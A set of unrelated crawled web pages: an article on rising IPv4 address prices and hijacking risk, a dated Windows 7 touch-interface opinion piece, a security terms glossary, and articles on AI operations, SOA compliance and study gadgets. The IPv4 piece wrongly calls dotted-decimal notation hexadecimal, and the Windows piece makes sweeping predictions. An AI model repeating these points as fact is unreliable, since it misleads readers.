Following the growing demand for internet commodities like IP assets, the prices of IPv4 addresses have reached new heights in recent times. Cybersecurity experts warn that this scenario could boost the risk of security threats as opportunistic cybercriminals might target unused or unsecured IP addresses to compromise them and trade on underground markets. Organizations that own or manage IPv4 address blocks should be vigilant and look out for any hijacking attempts on their IPv4 addresses by hackers. What is an IPv4 Address? The IPv4 or IP (version 4) address is the fourth version of the internet protocol (IP), which has a set of rules governing the format of data communications sent over the internet and other networks. IPv4 addresses are 32-bit integers that can be expressed in hexadecimal notation (Example: 192.0.2.146 is an IPv4 address) IPv4 and Associated Cyber Risks According to a report from IPXO, the price of an IPv4 address increased to $32 in Q1 2021 as the supply of IP resources failed to meet demand. It’s suspected that the increase in cyberattacks is a probable consequence of this price surge, as reselling hijacked IP addresses would be a profit in underground markets. The gap between the supply and demand of IP resources makes transactions expensive and exhaustive, leading companies to engage in IPv4 black market transactions. Vincentas Grinius, CEO of IPXO, stated that increased prices and limited accessibility contribute to the rise of cybercrimes. “Cybercriminals can exploit these vulnerabilities in two ways: firstly, they target the IPv4 addresses of companies who do not feel pressured by IPv4 depletion, unaware of what is being done to their vast reserves of IP resources. Secondly, they offer desperate companies, willing to side-step legalities, the opportunity to obtain needed IPv4 addresses quickly but at prices equal and, in some cases, higher than in legal markets.” The report also claims that over 800 million unused IPv4 addresses at present, which could become a prime target for attackers to re-sell them under the record-high market price. Some of the threats that affect IPv4 include: 1. Sniffing Attacks – A sniffing attack involves the illegal extraction of unencrypted data by capturing network traffic through packet sniffers. 2. Application Layer Attacks – An application layer attack targets computers by deliberately causing a fault in a computer’s operating system or applications. These include DDoS attacks, SQL injections, cross-site scripting, etc. 3. Flooding – Flooding results when a device is targeted with large amounts of network traffic, which could lead the network to become unavailable or out of service. 4. Rogue Devices – Rogue devices are unauthorized end-user computers or wireless access points that prey on sensitive information such as credit card numbers, passwords, and more. 5. Man-in-the-Middle Attacks – In a man-in-the-middle attack, the attacker places himself in an ongoing communication or data transfer between an application/service and its user to spy or impersonate someone. “Cybercriminals mainly capitalize on existing market problems, which the rapid price growth of IPv4 has demonstrated. By tapping into the vulnerabilities created by unequal resources, hijackers have created a lucrative black market. A possible solution to these issues is the creation of more sustainable internet governance. As IP leasing presents both a cost-efficient and accessible option for businesses, cybercriminals may be pushed out of the market by superior competition,” Grinius added.
<urn:uuid:e34b8497-2291-4576-91b7-943ad1b78635>
CC-MAIN-2024-38
https://cisomag.com/hike-in-ipv4-prices-pose-severe-cybersecurity-threat/
2024-09-20T15:55:36Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701419169.94/warc/CC-MAIN-20240920154713-20240920184713-00076.warc.gz
en
0.945262
736
2.6875
3
Although everyone is talking about it, few seem to understand what all this means. Here’s what it means: After several decades, the death of the WIMP user interface is at hand. (WIMP stands for Windows, Icons, Menus and Pointing devices.) Windows 7 contains core user interface functionality that researchers have been working on since the 1980s. It’s exciting, and will radically change the way you use computers forever. Here are the three things you need to know about Windows 7. 1. Windows 7 represents a new category of user interface that has no name. I first told you about this new generation of user interface and Windows 7 back in December (I Want My MPC: The ‘Multi-Touch PC’ Era Dawns). In that article, I told you: “The major components of this UI are multi-touch (the ability of a touch screen to accept many points of input at once); physics (on-screen objects that behave as if they have weight, mass, momentum and other physical properties); and gestures (the ability to send commands to the system by drawing a shape on screen).” These user interface elements, plus hardware changes that I detail below, represent a huge leap in computer usage comparable to the leap from the command line to the graphical user interface (GUI). The Apple iPhone has a very rudimentary (but first-to-market) version of this new OS type. Microsoft’s proprietary vertical Surface PC has it, too. Apple will switch to this kind of OS as early as next year. Linux will, too. This is where all computer user interfaces are going. But what do we call this new category of OS? So far, few agree. Some call it a multi-touch user interface. But the OS is more about physics and gestures than multi-touch. I suspect multi-touch was heavily marketed by Apple because it was the single most unique feature of the Apple iPhone from a hardware perspective. So everyone picked up on the M word. But it’s an inaccurate – or, at least, incomplete — descriptor for the new UI. I’d like to propose that we call this new kind of UI the MPG interface, for “Multi-touch, Physics and Gestures.” (Just throwing this against the wall here to see if it sticks.) I’ll refer to it as such for the rest of this article. 2. Pundits will bitch and moan about MPG, but later eat their words. In the early 1980s, the conventional wisdom was that DOS’s command line interface was faster, cleaner and generally better than that new-fangled, funky, slow “GUI” user interface of OS/2, Windows and others. All that was forgotten by the early 1990s, when everyone moved to GUI interfaces. A similar thing is happening today with the MPG idea. Blogger and Microsoft expert Mary Jo Foley writes: “I am still a non-believer. Do you want touch on your Windows notebook? I, for one, do not.” Henry Blodget wrote on the Silicon Valley Insider blog that “We never touch our PC screen, and we hate it when other people touch our PC screens. This will not change if Windows 7.” They’ll change their tunes, believe me. The reason is that reaching out and touching things is what comes naturally to humans. The mouse is a temporary interim device between typing commands via a command line interface and reaching out and directly manipulating objects on screen via the MPG interface. The whole history of user interfaces has always been about making the ever-increasing computer power that results from Moore’s Law work harder to make what’s on screen look and behave like real-world physical objects. Look at how video games have evolved toward increasing realism. We crave it. There will be many, many critics of the whole MPG approach. They’ll all eat their words. 3. The new generation of MPG OSs will kill off mice and keyboards. There will always be variety in PCs. But each generation of UI has its natural form-factor. For the WIMP UI, the standard desktop PC has involved a screen, keyboard and mouse on the desk, with a separate CPU nearby. The natural form factor for Windows 7 and the other MPG operating systems will look like a drafting table. The mouse and keyboard will go away, and the “CPU” electronics will be built into the back of a giant screen between 30 and 60 inches. It will pivot at the center of the left and right edges. It will tilt vertical for TV and presentations, and horizontal for “desk mode” where you can lay your physical books and papers right next to your electronic ones. Generally, however, you’ll use it in drafting table mode with the bottom of the screen at about waist high and the top of the screen at about head height when you’re in your chair. You’ll use both hands to grab, re-size, move, copy and interact with documents and other objects on-screen. When you want to write something, you’ll do the keyboard gesture to bring up an on-screen keyboard, and just type away. The natural MPG form factor for mobile computers will be a clamshell design with a screen on both sides (one where the screen is located on mobile computers today, plus another screen where the keyboard is now). It will snap flat to form a huge single screen with a kind of “kickstand” to put it at an angle, or you can use it in writing mode and have an on-screen keyboard and touchpad on the bottom and your documents on the top (like today’s laptops, but with virtual keyboard and touchpad). Microsoft’s demo included a standard laptop, with all the touching going on awkwardly on the standard screen. But future MPG-specific laptops will have touching going on full screen, or mainly the bottom half when used in clamshell mode. Optional physical keyboards will pop out of both desktop and mobile systems, or connect via Bluetooth. They’ll be there for purists, old people and others who don’t like the virtual, on-screen keyboards. But the mouse will be gone forever. Windows 7 might be great, or it might be another dog like Windows Vista. But mark my words, the next couple of years will usher in the next generation of user interface from Microsoft, Apple and the Linux community, and it’s going to be really, really cool.
<urn:uuid:4212438c-fa5c-42f7-9ce2-490f82b60f50>
CC-MAIN-2024-38
https://www.datamation.com/trends/the-three-things-you-need-to-know-about-windows-7/
2024-09-20T18:26:23Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701419169.94/warc/CC-MAIN-20240920154713-20240920184713-00076.warc.gz
en
0.944269
1,381
2.71875
3
Let’s do a show of hands — who loves jargon? Anyone? I didn’t think so. Face it, aside from trivia champions, jargon doesn’t make life any easier for us. If you’re attending your first security conference this year, you might feel like you need an interpreter to make sense of the technical terminology and acronyms you’ll find around every corner. At Cisco Umbrella, we’re fluent in cybersecurity – and we want to help you make sense of the often-confusing security landscape! In this post, we define key cybersecurity terms that everyone should know in 2020 — and beyond. Part 1: Threats Backdoor: A backdoor is an access point designed to allow quick and undetected entrance to a program or system, usually for malicious purposes. A backdoor can be installed by an attacker using a known security vulnerability, and then used later to gain unfettered access to a system. Botnet: A botnet is a portmanteau for “robot network.” It’s a collection of infected machines that can be used for any number of questionable activities, from cryptomining to DDoS attacks to automated spam comments on blogs. Command-and-control (C2) attacks: Command-and-control attacks are especially dangerous because they are launched from inside your network. Security technologies like firewalls are designed to recognize and stop malicious activity or files from entering your network. However, a command-and-control attack is trickier than a standard threat. A file doesn’t start out showing any malicious behavior, so it is deemed harmless by your firewall and permitted to enter your network. Once inside, the file stays dormant for a set period of time or after being triggered remotely. Then, the file reaches out to a malicious domain and downloads harmful data, infecting your network. Denial of Service (DoS) Attack: This type of attack consumes all of the resources of a target so that it can no longer be used or reached, effectively taking it down. DoS attacks are designed to take a website or server offline, whether for monetary, political, or other reasons. A DDoS, or Distributed Denial of Service attack, is a subcategory of DoS attack that is carried out using two or more hosts, often via a botnet. Drive-by download: A drive-by download installs malware invisibly in the background when the user visits a malicious webpage, without the user’s knowledge or consent. Often, drive-by downloads take advantage of browser or browser plug-in vulnerabilities that accept a download under the assumption that it’s a benign activity. Using an up-to-date secure browser can help protect you against this type of attack. Exploit: An exploit is any attack that takes advantage of a weakness in your system. It can make use of software, bits of data, and even social engineering (like pretending to be someone from your IT team who needs your password to perform a security update). To minimize exploits, it’s important to keep your software up-to-date and to be aware of social engineering techniques (see below). Malware: Malware is a generic term for any program installed on a system with the intent to corrupt, damage, or disable that system. Razy, TeslaCry, NotPetya, and Emotet are a few recent examples. - Cryptomining malware: Cryptomining by itself is not necessarily malicious — many people mine crypto currency on their own systems. Malicious cryptomining, however, is a browser- or software-based threat that enables bad actors to hijack system resources to generate crypto currencies. Cryptomining malware is an easy way for bad actors to generate cash while remaining anonymous and without having to use their own resources. Learn more about the cryptomining malware threat. - Ransomware: Ransomware is malware used to encrypt a victim’s data with an encryption key that is known only to the attacker. The data becomes unusable until the victim pays a ransom to decrypt the data (usually in cryptocurrency). Ransomware is a fast-growing and serious threat — learn more in our newly updated guide to ransomware defense. - Rootkits: A rootkit is a malicious piece of code that hides itself in your system, prevents detection, and enables bad actors to gain continued access to your system. If attackers gain full access to your system once, they can use rootkits to continue that access over a long period of time. - Spyware: Malicious code that gathers information about you and your browsing habits, and then sends that information to a third party. - Trojans: A trojan is a seemingly innocuous program that acts as a front for malicious code hiding inside. Trojans can do any number of things, from stealing data to allowing remote system control. These programs take their name from the famous Grecian “Trojan Horse” that took advantage of a similar vulnerability. - Viruses: Often used as a blanket term, a virus is a piece of code that attaches itself to files, such as email attachments or files you download online. Once it infects your system, it can cause all kinds of problems, whether that means deleting system files or corrupting your data. Computer viruses also replicate and spread across networks – just like viruses in the physical world. - Worms: A worm is a type of malware that clones itself in order to spread to other computers, performing various damaging actions on whatever system it infects. Unlike a virus, a worm exists as a standalone entity — it isn’t hidden inside something else like an attachment. MitM or Man-in-the-Middle Attack: A MitM attack is pretty much what it sounds like. An attacker will intercept, relay, and potentially change messages between two parties without their knowledge. MitM can be used to break encryption, compromise account details, or gain access to systems by impersonating a user. Phishing: Phishing is a technique that mimics a legitimate communication (like an email from your online bank) to steal sensitive information. Like fishermen with a lure, attackers will attempt to take your personal information by using fake emails, forms, and web pages to coax you to provide it to them. - Spear phishing is a form of phishing that targets one specific individual by using publicly accessible data about them, like from a business card or social media profile. - Whale phishing goes one step further than spear phishing and describes a targeted attack on a high-ranking individual, like a CEO or government official. Social engineering: A general term for any activity in which an attacker is trying to manipulate you into revealing information, whether over email, phone, web forms, or social media platforms. Passwords, account credentials, social security numbers — we often don’t think twice about giving this information away to someone we can trust, but who’s really on the other end of the line? Protect yourself, and think twice before sharing. It’s always OK to verify the request for information in another way, like calling an official customer support number. Zero-day (0day): A zero day attack is when a bad actor exploits a new, previously unknown software vulnerability for which there is no patch. It’s a constant struggle to stay ahead of attackers, but you don’t have to do it alone — you can get help from the security experts at Cisco Talos. Part 2: Solutions Anti-malware: Anti-malware software is a broad category of software designed to block, root out, and destroy viruses, worms, and other nasty things that are described in this list. These products need to be updated regularly to ensure that they remain effective against new threats. They can be deployed at various points in the network chain (email, endpoint, data center, cloud) and either on-premises or delivered from the cloud. Cloud access security broker (CASB): This is software that provides the ability to detect and report on the cloud applications that are in use across your environment. It provides visibility into cloud apps in use as well as their risk profiles, and the ability to block/allow specific apps. Read more about securing cloud apps here. Cloud security: This is a subcategory of information security and network security. It is a broad term that can include security policies, technologies, applications, and controls that are used to protect sensitive company and user data wherever it is exposed in a public, private, or hybrid cloud environment. DNS-layer security: This is the first line of defense against threats because DNS resolution is the first step in establishing a connection to the internet. It blocks requests to malicious and unwanted destinations before a connection is even established — stopping threats over any port or protocol before they reach your network or endpoints. Learn more about DNS-layer security here. Email security: This refers to the technologies, policies, and practices used to secure the access and content of email messages within an organization. Many attacks are launched via email messages, whether through targeted attacks (see note on phishing above) or malicious attachments or links. A robust email security solution protects you from attacks whether email is in transit across your network or when it is on a user’s device. Encryption: This is the process of scrambling messages so that they cannot be read until they are decrypted by the intended recipient. There are several types of encryption, and it’s an important component of a robust security strategy. Endpoint security: if DNS-layer security is the first line of defense against threats, then you might think of endpoint security as the last line of defense! Endpoints can include desktop computers, laptop computers, tablets, mobile phones, desk phones, and even wearable devices — anything with a network address is a potential attack path. Endpoint security software can be deployed on an endpoint to protect against file-based, fileless, and other types of malware with threat detection, prevention, and remediation capabilities. Firewall: Imagine all the nasty, malicious stuff on the Internet without anything to stop it. A firewall stands between your trusted entities and whatever lies beyond, controlling access based on security rules. A firewall can be hardware or software, a standalone security appliance or a cloud-delivered solution. Next-generation firewall (NGFW): This is the industry’s new solution for an evolved firewall. It is typically fully integrated with the rest of the security stack, threat-focused, and delivers comprehensive, unified policy management of firewall functions, application control, threat prevention, and advanced malware protection from the network to the endpoint. Security information and event management (SIEM): This is a broad term for products that deal with security information management (SIM) and security event management (SEM). These systems allow for aggregation of information and events into a single “pane of glass” for security teams to use. Secure web gateway (SWG): This is a proxy that can log and inspect all of your web traffic for greater transparency, control, and protection. It allows for real-time inspection of inbound files for malware, sandboxing, full or selective SSL decryption, content filtering, and the ability to block specific user activities in select apps. Secure internet gateway (SIG): This is a cloud-delivered solution that unifies a variety of connectivity, content control, and access technologies to provide users with safe access to the internet, both on and off the network. By operating from the cloud, a SIG protects user access anywhere and everywhere, with traffic routing to the gateway for inspection and policy enforcement regardless of what users are connecting to, or where they’re connecting from. Because a SIG extends security beyond the edge of the traditional network — and without the need for additional hardware or software — thousands of enterprises have adopted it as a modern catch-all for ensuring that users, devices, endpoints, and data have robust protection from threats. Secure access service edge (SASE): Gartner introduced an entirely new enterprise networking and security category called “secure access service edge.” SASE brings together networking and security services into one unified solution designed to deliver strong security from edge to edge — in the data center, at remote offices, with roaming users, and beyond. By consolidating a variety of powerful point solutions into one solution that can be deployed anywhere from the cloud, SASE can provide better protection and faster network performance, while reducing the cost and work it takes to secure the network. Cybersecurity is always evolving, and it can be hard to keep up with the rapid pace of changes. Be sure to bookmark this blog post – we’ll keep it up to date as new threats and technologies emerge. To learn more, check out our recent blog posts about cybersecurity research. Don’t be shy!
<urn:uuid:9a435f14-6a1c-4ea8-899e-c0ce4deb1ecb>
CC-MAIN-2024-38
https://www.channele2e.com/native/cybersecurity-terms-and-threats-a-glossary-for-you
2024-09-13T08:17:36Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651510.65/warc/CC-MAIN-20240913070112-20240913100112-00776.warc.gz
en
0.925234
2,666
2.921875
3
Preparing for AI and Automation It is undeniable that Artificial Intelligence and Automation are in the minds of the public. With major corporations such as Google, Amazon, Facebook, and Microsoft making the news on their artificial-intelligence research and products, and personalities such as Elon Musk, Bill Gates, and Stephen Hawking holding interviews warning of an A.I. apocalypse, it's no wonder people are talking about it. Artificial Intelligence has recently migrated into Information Technology, with several companies providing solutions for IT Operations. Executives and managers are quickly eyeing it up, excited by its abilities to make employees more efficient, reduce downtime, and minimize staffing. The marketing for these products is very positive, extolling the simplicity of operations and their effectiveness. The algorithms, as it is explained, will handle everything. There is a configuration cost to get it up and running and to keep it running smoothly that management may not see at first. There is no "Easy" button here. Depending on the organization, implementing an A.I. and automation platform may require thousands of hours of work. This article aims to provide some thoughts on prerequisites to using A.I. in your IT infrastructure. The first requirement is management access. These A.I. algorithms work with large amounts of data. They want to see everything, so it can be potentially correlated. Thus, we need access to everything from where the A.I. system will be installed. All devices need to be accessible via some form of management network including servers, switches, routers, firewalls, power strips, UPS's, KVM’s, and more. Effectively, anything that has the option of connecting an Ethernet cable and configuring an IP address, needs to have that done. Unless you have an existing inventory of every device that uses a power cable, this step will probably also require a full inventory of all equipment at every location. Many of these devices may be managed by other departments as well, requiring internal resources and collaboration. This is also an important step for many other reasons, and is highly recommended before continuing. Be sure to name these devices in a consistent manner. Most of the algorithms in use require similar wording used between devices in a logical or physical area in order to increase matching probability. This will require the formulation of a corporation-wide naming standard, and potentially renaming hundreds or thousands of devices. Regarding the network itself, depending on your environment, you may not have a management network, or you may have an unfinished one. So you'll need to design and create one for each of your locations, and get that routed properly. Or, maybe you have a very large environment with many management networks for various purposes and departments. Those will need to be identified, routes may need to be created, VPN SA’s may need reconfiguration, and ACL’s opened to the location of the A.I. system. Now that there is a management network that can communicate between all devices and your A.I. system, you need to provide management services to it. The first thing that comes to mind is SNMP. A modern network should have SNMPv3 configured if a device supports it, which requires some security design effort as well. MIB’s may have to be found, or OID’s walked. Devices will need to be configured to report all SNMP traps possible, and to allow polling from the A.I. collector. Next up would be Syslog. Preferably with encryption if supported for each device. This step would be best designed with a series of Syslog collection servers, local to each location, then forwarding those localized collections to the A.I. collector. This would require design and implementation time for such a distributed Syslog system. Part of that system would most likely include an ELK stack implementation on top of it for additional analysis, which can be very involved. There may be other monitoring systems already in-place, performing up/down detection, resource utilization alerting, and synthetic transactions. Similarly, systems such as vCenter and AWS Cloudwatch may be used. Each of these systems would need to be configured to copy all alerts to the A.I. collector. These configurations may also need to be customized for the collector, as the A.I. will want to know about events sooner and more frequently than an email alert to IT personnel. It’s very likely these reporting systems may send alerts to a ticketing system or collaboration service, which should also be integrated into the A.I. platform as an output. Once the algorithms detect a highly-probable issue, a ticket can be created for front line personnel. This may also require configuration and scaling considerations for your email server, depending on how it is integrated. So far, we’ve talked about the setup of the networked devices, to allow for detection of issues. Once these alerts are investigated, they need an action performed. If an organization wishes to enable automation, that is, the automatic resolution of alerts from these A.I. systems, there needs to be remote management access provided to all devices. Not in the form of data flow from the networked devices, but the remote access of them. Remote access methods such as SSH, and Powershell are most common today. If a device is too old or not licensed to run SSH or Powershell for example, that device will need to be replaced or upgraded. The configuration of this remote access requirement may also be lengthy. The automation methods provided usually rely on scripts of some kind. Scripts you may want to run via an automation system such as Ansible, rather than individual shell scripts. Again, we find a system that needs planning and implementation. This also requires personnel to write resolution scripts and playbooks for each issue that is detected, which would require personnel who know how to code, and certainly take a lot of time initially. Finally, these A.I. alerts and resolutions only happen when the algorithm has a high level of confidence that an issue is correct. That means personnel need to train the system, especially in the beginning. There are usually many algorithms that work together, each one using a different set of rules, which requires care and validation. Algorithms are diverse and may include the ability to detect relationships between alerts based on source type, physical or logical proximity, time, language usage, and topology analysis. As you can see, there is no "Easy" button here. A.I. platforms, their automation systems, and their algorithms are extremely powerful today, but they require planning, lots of preparatory work, and training once running. They cannot be implemented quickly, as a quick fix for lack of enough personnel, and in fact, will require more personnel during the implementation and configuration phase. When properly planned for and implemented, an A.I. system can be an important enhancement to IT Operations.
<urn:uuid:b252550a-a9e7-4659-9f7a-eb286aa09af1>
CC-MAIN-2024-38
https://ine.com/blog/preparing-for-ai-and-automation
2024-09-14T14:50:59Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651579.38/warc/CC-MAIN-20240914125424-20240914155424-00676.warc.gz
en
0.959728
1,419
2.734375
3
What is SOA? SOA stands for service-oriented architecture, and it is an architecture that allows organizations to use services to achieve IT goals. Systems are designed over a network using a communications protocol, and using SOA as a framework can greatly simplify a variety of processes and reduce the costs of doing business. Additionally, SOA can make it easier for organizations to adhere to government regulations and meet service level agreements. SOA allows organizations to create a framework that works for their needs. As with other IT architectures, there is no set way of doing things, just a guide for figuring out how to do them. The thing that sets SOA apart from other architectures is that it involves making services work together within programs and processes to create a framework. There are several definitions, but, generally speaking, a service is a self-contained unit that provides a function, such as handling currency exchanges or collecting data put in by a user. Working together, services can be combined to make larger applications function, and they are able to share data across computers and systems. Services can share data between each other automatically, so they are able to be used by a wide variety of users and programs. Using the same set of services in a large number of programs can represent an enormous savings in terms of time and development efforts for an organization. SOA compliance involves following processes put in place by the organization that created the framework, and compliance with SOA can allow businesses to also be in compliance with government regulations. For instance, if a law requires businesses to maintain a change log that is updated whenever a particular file is modified, the business can set their SOA framework up to require that a service perform this task. By complying with the SOA, the business will also be complying with the government regulation. (This article is part of our Security & Compliance Guide. Use the right-hand menu to navigate.) Who uses SOA? Large businesses and the government tend to be the most common users of SOA, and this is often due to the need to both follow a variety of regulations and share data across a wide range of users and systems. Initially, businesses were the first to take advantage of SOA, but in the last decade or so, the government has made a concerted effort to use SOA in both state and federal systems. As mentioned, one of the strong points of SOA is that it uses services to create functionality. Government entities are required to share vast amounts of data with other entities on a regular basis. Take state licensing systems. Even within the same state, there are several offices that are responsible for different tasks but need the same data to accomplish them. Counties will often handle data gathering and distribution of driver’s licenses, but state offices are normally the ones that revoke people’s driving privileges. Without a framework like SOA, each county may have its own program that collects and stores data about citizens and their driving records, and the state may have yet another. This can create enormous amounts of redundancy and problems getting databases to communicate properly. However, with SOA, all involved organizations can use the same services to collect, maintain and access data. Businesses with a variety of locations and divisions benefit from SOA for many of the same reasons. Data sharing is often much simpler since it is coming from the same services and programs instead of being patch-worked together. This also means that if there are problems, it’s easy to determine where they are coming from. Maintaining security and handling upgrades are also less challenging when applications are using the same services. Businesses frequently make use of SOA to follow guidelines put in place either by the business itself or the government. There are numerous IT regulations that different industries must follow, and there are not architectures for many of them. The health care industry, for example, has to follow a range of rules and requirements for handling medical records. SOA allows businesses to create a framework with security measures and data protections built in, which can make the process of proving compliance with government standards much easier. Businesses are able to provide their framework to auditors and then demonstrate that they are following the framework they set up. Reporting mechanisms can be made a part of the architecture, making the compliance process a relatively simple and transparent one. While there are a number of benefits to using SOA to create a framework for an organization, there is a variety of potential pitfalls as well. For SOA to work effectively, it requires discipline in implementation, and usage. While the architecture is one that can be applied in a slow and progressive manner (one service at a time), it is not one that will work properly if it is used piecemeal. If the goal is not to eventually end up with a system that complies with SOA architecture, the result is usually a mishmash of services and programs that don’t fit together well or live up to expectations. The majority of businesses and organizations that are currently adopting SOA are ones that already have a framework in place. There are few cases where an organization can completely eliminate their current framework and start from scratch, so SOA adoption is almost always a transition, with the exception being new organizations that have nothing in place. As with most architectures, it is necessary to establish what an organization needs to accomplish. From there, it’s a matter of determining which functions are a priority and accomplishing goals and integrations in a set order. In cases where a business has an established and functioning framework, the analysis may be focused on determining where the most overlap is and then prioritizing the creation of services that can be used the largest number of applications. SOA is mostly built on a variety of parts that allow services to work together. Some of the major components that SOA relies upon are: Service Oriented Enterprise (SOE): The SOE lists the processes and procedures that are used to create and maintain the SOA. This also frequently includes the names of the individuals who make the rules for running a SOA and who is responsible for ensuring that goals are met. Service Oriented Infrastructure (SOI): This is the environment that the services run on. The environment is responsible for ensuring that services are able to connect and communicate properly. In a very general sense, the SOI can be likened to an operating system for services and processes to run on. Service registry: This is a critical part of the SOA in that it lists all services that are available. It includes information about what they do and how they can be used via service metadata. A service registry prevents redundancy and makes it easier to determine which processes need to be built. Business processes: These are what allow services to function together to complete tasks. An example of a business process is when customers are emailed a monthly statement. One service collects customer data, another service pulls an individual’s transactions for the last 30 days and yet another service sends out the automated emails; a business process is what makes them all work together. Master data management (MDM) hub: An MDM hub is used to take information and data from a variety of sources and standardize how it is stored and accessed. There are several ways that MDM hubs can be set up, but their goal is to eliminate duplicate data, provide formatting standards and ensure that data is accurate and accessible by services that need to use it. Data management: Handling and sharing data are easier with services that limit the number of input sources, but a robust data management plan is still a necessary part of SOA. In addition to the fact that a variety of services may be used to collect different types of data, data may also be coming from outside of an organization. As such, data management is used to create policies for handling, tracking and securing data. Enterprise service bus (ESB): The ESB allows services in a framework to communicate with each other across different applications and processes. It is frequently used by the MDM hub to access data and messages from applications, so it is a system that enables communication, not one that manages data. Adhering to SOA governance is a way of ensuring that an organization’s systems continue to work properly, and doing so can be a start of verifying compliance to legal regulations. It is also often used as a way of demonstrating that information is secure, something that may be important to users and stakeholders or investors. An SOA audit will mean different things for different organizations depending on what their goals are. However, common topics include ensuring that security protocols are in place and that services are created and managed properly. Audits will normally rely on reporting to verify that systems are working correctly, and they may also include ensuring that a framework is addressing the needs and obligations of an organization. Although security is often easier to establish with an SOA framework because there are often fewer working parts, that doesn’t mean it’s not a major concern. SOA still requires that organizations put user authentications in place across applications and environments as well as ensure that services and applications are not easily accessed by unauthorized parties. Reporting systems are also essential to providing an organization with information about how well a framework is performing. Quality of service and error reporting are key to verifying that services are working quickly and without problems, and they may also help to prove that SLAs are being met. Reporting helps an organization determine if and where there are problems as well as demonstrating to outside parties that a framework and organization are doing their jobs properly. Coupled with the importance of reporting is going over requirements for a system on a regular basis and ensuring that they are being tracked and met. The government frequently refines or clarifies regulations that organizations must meet, so SOA governance will need to be updated to reflect these changes. Additionally, requirements or obligations for an organization may change based on new SLAs or expectations from stakeholders. An SOA will not remain viable if it is not being updated to address the needs of an organization. Service creation and management are another critical part of SOA governance because they are issues that are at the heart of the architecture. If services are not managed properly, it defeats the purpose of using SOA to create a framework. It is crucial that services are created and made available in such a way that there is as little redundancy as possible. Services should also be reused rather than having new ones created, and to help this process, documentation and information about services should be readily available and robust. Services must also be properly maintained and monitored to ensure that they are able to meet user demands. When there are a large number of users involved, scalability can turn into a problem that results in errors, slow response times, corrupted data and failure to meet SLAs or government regulations. A major part of ensuring that SOA governance requirements are being met is having specific guidelines and processes for creating services, ensuring interoperability and maintaining the framework, and specific people need to be named as responsible for making this happen. Without having named individuals in charge of making choices, it can be difficult for companies to make changes that are needed to address problems or make needed alterations to their SOA framework and governance. As with other architectures, complying with procedures and ensuring that objectives are being met is an ongoing process. In addition to the fact that networks and systems are constantly changing, creating nearly endless opportunities for things to go wrong, business obligations are also frequently in flux. New innovations, requests from users and the ever present issues of security prevent organizations from ever being done with ensuring compliance with SOA.
<urn:uuid:779eb26e-d1d4-4c01-9291-64e134a479e0>
CC-MAIN-2024-38
https://www.bmc.com/blogs/security-soa-compliance/
2024-09-14T13:58:38Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651579.38/warc/CC-MAIN-20240914125424-20240914155424-00676.warc.gz
en
0.965141
2,362
3.421875
3
What does one need in creative writing? Imagination, a strong vocabulary, and good research skills are essential, but the tools of the trade can and must be adapted to the digital age. Academic writing means exclusively original ideas about well-researched topics, persuasive and sophisticated writing skills and timely submission. It also means focusing on a certain topic without ignoring other classes and spending some free time with people who are or will become your friends. Gadgets can be used to make the educational process more efficient, but they can also add a bit of fun to the mix that is modern education. “The hurrier I go, the behinder I get” This might be a grammatically questionable quote, but it perfectly describes academic writing. Time is of the essence for students around the world and it’s not easy to plan every minute just right. To make things worse, students regularly spend up to 70 hours per week handling their classes and academic projects. This might seem like a good idea at first, but it is probably affecting creativity and productivity overall. Students are regularly exposed to stressors like challenging assignments, practice, and projects as well as the need to adapt to a new and different environment. If persistent, this can (and will) sometimes lead to Burnout Syndrome. Burnout is a response to the daily stressors of the academic life of students and it does affect creativity as well as productivity. It also affects academic performance, self-esteem, and psychological health. Creative writing is one of the tasks that many students may find challenging at first, but it may also enable them to fight burnout with the help of modern gadgets. After all, technology makes our lives easier and better in many ways and it can also help students when writing. Every story needs a hero The writer may be the true hero of the story, but every Batman needs a Robin. So do academic and working writers everywhere. Tools, tips, and gadgets are the proper sidekicks any writer needs. But what are the best gadgets for academic writing in the digital age? Technology does come at a price, so the perfect gadgets for a student must be those that provide real benefits with little or no drawbacks. This means that smartphones may not make the list as they are not cost-efficient when it comes to academic writing and they are sure to provide users with other distractions. Gadgets that help students save time Students often feel that time is ticking away at an alarming rate, especially when they are juggling tasks and projects. They will soon start to feel overwhelmed and Burnout Syndrome may be just one step away. Gadgets that help them save time for fun and play are sure to be a good investment for their health, productivity and creativity. This might mean investing in a new laptop that will provide them with the ultraportable power to analyze and write as they please. Gadgets that help students read and research Extensive reading is a big part of the educational process, especially when it comes to academic writing. Gadgets like Amazon’s Kindle or Kobo have been designed to make reading even more fun and accessible. E-readers are cost-efficient gadgets that provide students with a custom-made library on the go. Newer models include features like built-in lighting for reading in the dark and 3G connectivity, making them perfect for campus life. Even more, e-readers make notes and research available at a touch without the drawbacks of paperbacks. Gadgets that make students healthier and happier Wearables are often used to gather data about users’ health and wellbeing, prompting them to change their habits if needed. Considering the fact that students everywhere fight stressors and fatigue, wearables seem the perfect solution. Some smart devices also keep users informed about every planned activity they must do. They allow users to create a schedule and later inform them about the tasks they need to complete. This is a perfect feature for keeping track of multiple writing tasks and will allow students to effectively add academic writing to their program. Technology opens up new possibilities for academic and working writers everywhere. While students are regularly exposed to stressors and burnout, the digital age has provided them with new tools to fight old foes and save time. After all, there is no writing without living.
<urn:uuid:138cf583-66df-4b4f-81ba-1327edf07625>
CC-MAIN-2024-38
https://educationcurated.com/editorial/how-to-use-gadgets-in-creative-academic-writing/
2024-09-15T19:56:57Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651647.78/warc/CC-MAIN-20240915184230-20240915214230-00576.warc.gz
en
0.96385
875
2.703125
3